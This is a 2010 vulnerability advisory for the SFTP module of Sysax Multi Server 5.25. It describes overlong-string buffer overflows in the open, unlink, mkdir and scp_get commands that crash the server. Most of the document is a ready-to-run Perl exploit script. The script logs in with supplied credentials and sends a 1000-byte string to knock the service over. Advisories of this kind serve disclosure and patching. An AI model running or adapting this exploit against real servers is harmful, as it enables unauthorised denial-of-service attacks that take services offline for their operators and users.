[]Title: Sysax Multi Server(SFTP module) "open", "unlink", "mkdir", "scp_get"
Commands DoS Vulnerabilities
[]Product: Sysax Multi Server
[]Vendor: Codeorigin, LLC
[]Version: 5.25 (earlier versions may also be affected)
[]Platform: Windows
[]Type of Vulnerability: Buffer overflow โ>DoS
[]Risk rating: Medium
[]Date of Discovery: 21-Jun-2010
[*]Discoverd by: leinakesi (leinakesi[at]gmail[dot]com)
Several Denial of Service vulnerabilities exist in SFTP module of Sysax Multi Server. The
unsafe commands include "open","unlink", "mkdir" and etc. .which can not handle overlength
strings properly.
If you could log on the server successfully, take the following steps and the Sysax Multi
server will crash which would lead to Denial of Service attack:
#initialize $FUZZ = "A" x 1000
$ssh2 = Net::SSH2->new();
$ssh2->connect($server, $port);
$ssh2->auth_password($user, $pass);
#there are several ways to compromise the server, I list them here as 4.1, 4.2, and etc. โฆ
4.1 $scpget = $ssh2->scp_get($FUZZ);
4.2 $sftp = $ssh2->sftp(); $o1 = $sftp->open($FUZZ);
4.3 $sftp = $ssh2->sftp(); $u = $sftp->unlink(FUZZ);
4.4 $sftp = $ssh2->sftp(); $m = $sftp->mkdir($FUZZ);
5 $ssh2->disconnect();
Exploit example:
#!/usr/bin/perl
#leinakesi[at]gmail.com
#Sysax Multi Server "open", "unlink", "mkdir", "scp_get" Commands DoS Vulnerabilities
use Net::SSH2;
use Getopt::Std;
$FUZZ = "A" x 1000;
getopts('S:P:u:p:', \%opts);
$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass = $opts{'p'};
if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) )
{
print "usage:\n\tperl test.pl -S [IP] -P [port] -u [user] -p
[password]\nexample:\n";
print "\tperl test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";
exit(0);
}
$ssh2 = Net::SSH2->new();
$ssh2->connect($server, $port) || die "can not connect the server, please check.\n";
$ssh2->auth_password($user, $pass) || die "you sure user name and password are correct?\n";
#any of the following commands will cause the server carsh.
$scpget = $ssh2->scp_get($FUZZ) || die "server crashed.\n";
print "\nover\n";
$ssh2->disconnect();
exit(0);